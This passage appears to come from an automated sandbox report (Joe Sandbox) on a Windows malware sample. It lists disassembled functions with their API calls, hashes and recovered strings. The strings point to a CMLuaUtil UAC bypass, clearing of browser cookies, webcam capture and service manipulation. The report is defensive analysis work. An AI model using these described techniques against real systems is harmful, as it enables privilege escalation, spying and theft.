                                                                                          • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                                        • _wcslen.LIBCMT ref: 0041B763
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                                                                        • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                                                        • API String ID: 3286818993-122982132
                                                                                        • Opcode ID: ff64268ecf0c31a6c4424bc126999b380d0383f46c80c29dc48f1e307bbff0a4
                                                                                        • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                                                                        • Opcode Fuzzy Hash: ff64268ecf0c31a6c4424bc126999b380d0383f46c80c29dc48f1e307bbff0a4
                                                                                        • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004135A6: RegOpenKeyExA.KERNELBASE(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                                                          • Part of subcall function 004135A6: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                                                                          • Part of subcall function 004135A6: RegCloseKey.KERNELBASE(?), ref: 004135F2
                                                                                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                                                        • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                        • API String ID: 1133728706-4073444585
                                                                                        • Opcode ID: 1e05d710c332b0c32bace29fd72cf7e3a184a0c4047cd7709485bc9a7fc4ad42
                                                                                        • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                                                        • Opcode Fuzzy Hash: 1e05d710c332b0c32bace29fd72cf7e3a184a0c4047cd7709485bc9a7fc4ad42
                                                                                        • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                                                                        • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                                                        • Opcode Fuzzy Hash: 934edf86da25d837fa7b61c38a686264b457019a14f29bbb32a15566fa7518be
                                                                                        • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00450EFA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                                                        • _free.LIBCMT ref: 00450F48
                                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                        • _free.LIBCMT ref: 00450F53
                                                                                        • _free.LIBCMT ref: 00450F5E
                                                                                        • _free.LIBCMT ref: 00450FB2
                                                                                        • _free.LIBCMT ref: 00450FBD
                                                                                        • _free.LIBCMT ref: 00450FC8
                                                                                        • _free.LIBCMT ref: 00450FD3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                        • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                                                        • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                        • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                                                        • int.LIBCPMT ref: 00411183
                                                                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                                        • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                        • String ID: (mG
                                                                                        • API String ID: 2536120697-4059303827
                                                                                        • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                                                                        • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                                                        • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                                                                        • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                                                        • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                        • String ID:
                                                                                        • API String ID: 3852720340-0
                                                                                        • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                        • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                                                                        • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                                                                        • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\Public\Libraries\nmfsxfjX.pif), ref: 004075D0
                                                                                          • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                                                                          • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                                                                        • CoUninitialize.OLE32 ref: 00407629
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InitializeObjectUninitialize_wcslen
                                                                                        • String ID: C:\Users\Public\Libraries\nmfsxfjX.pif$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                        • API String ID: 3851391207-3769394047
                                                                                        • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                                        • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                                                                        • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                                                                        • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                                                                        • GetLastError.KERNEL32 ref: 0040BAE7
                                                                                        Strings
                                                                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                                                                        • UserProfile, xrefs: 0040BAAD
                                                                                        • [Chrome Cookies not found], xrefs: 0040BB01
                                                                                        • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DeleteErrorFileLast
                                                                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                        • API String ID: 2018770650-304995407
                                                                                        • Opcode ID: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                                                                        • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                                                                        • Opcode Fuzzy Hash: c69a48e60de484867d8b749c5ae4c270b90bc560c43d961a50d917c7878b2bfc
                                                                                        • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044333A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$PkGNG$mscoree.dll
                                                                                        • API String ID: 4061214504-213444651
                                                                                        • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                                        • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                                                        • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                                        • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041ADC0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041ADF2
                                                                                        • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE00
                                                                                        • Sleep.KERNEL32(00002710), ref: 0041AE07
                                                                                        • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AE10
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                        • String ID: Alarm triggered$`#v
                                                                                        • API String ID: 614609389-3049340936
                                                                                        • Opcode ID: 2f63ca3754ee2fa8067f4581fa5685451e0165abe6878d0f9dceb9a842065b81
                                                                                        • Instruction ID: 9c0713ce1321a11b0f254193fe9a85ef30a97b7eb59a64372af151f10574a600
                                                                                        • Opcode Fuzzy Hash: 2f63ca3754ee2fa8067f4581fa5685451e0165abe6878d0f9dceb9a842065b81
                                                                                        • Instruction Fuzzy Hash: 36E01226B44260779620377B6D4FD6F3D28DAC2B5170100BEFA0666192D9580C4586FB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __allrem.LIBCMT ref: 0043AC69
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                                                                        • __allrem.LIBCMT ref: 0043AC9C
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                                                                        • __allrem.LIBCMT ref: 0043ACD1
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                        • String ID:
                                                                                        • API String ID: 1992179935-0
                                                                                        • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                                        • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                                                                        • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                                                                        • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                                                                          • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: H_prologSleep
                                                                                        • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                                                                        • API String ID: 3469354165-3054508432
                                                                                        • Opcode ID: 2bae3fc1a4521fd6cfe0abfe2e334f7941d0747335ff3d87f549c58b7eefc5ba
                                                                                        • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                                                                        • Opcode Fuzzy Hash: 2bae3fc1a4521fd6cfe0abfe2e334f7941d0747335ff3d87f549c58b7eefc5ba
                                                                                        • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __cftoe
                                                                                        • String ID:
                                                                                        • API String ID: 4189289331-0
                                                                                        • Opcode ID: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                                                                        • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                                                                        • Opcode Fuzzy Hash: 5e612228480a368e38a3c2cd5c9ced2759c3311217c7fd18b84c82b5e53f56ae
                                                                                        • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                        • String ID:
                                                                                        • API String ID: 493672254-0
                                                                                        • Opcode ID: 91938c1d555d364b93c99e00d8beeb13e1151d7f412d7edf767a6a0184c3eeef
                                                                                        • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                                                                        • Opcode Fuzzy Hash: 91938c1d555d364b93c99e00d8beeb13e1151d7f412d7edf767a6a0184c3eeef
                                                                                        • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044A004 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __alldvrm$_strrchr
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 1036877536-263838557
                                                                                        • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                                                                        • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                                                                        • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                                                                        • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                                                                        • _free.LIBCMT ref: 0044824C
                                                                                        • _free.LIBCMT ref: 00448274
                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                                                                        • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                                                                        • _abort.LIBCMT ref: 00448293
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                        • String ID:
                                                                                        • API String ID: 3160817290-0
                                                                                        • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                                        • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                                                                        • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                                                                        • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
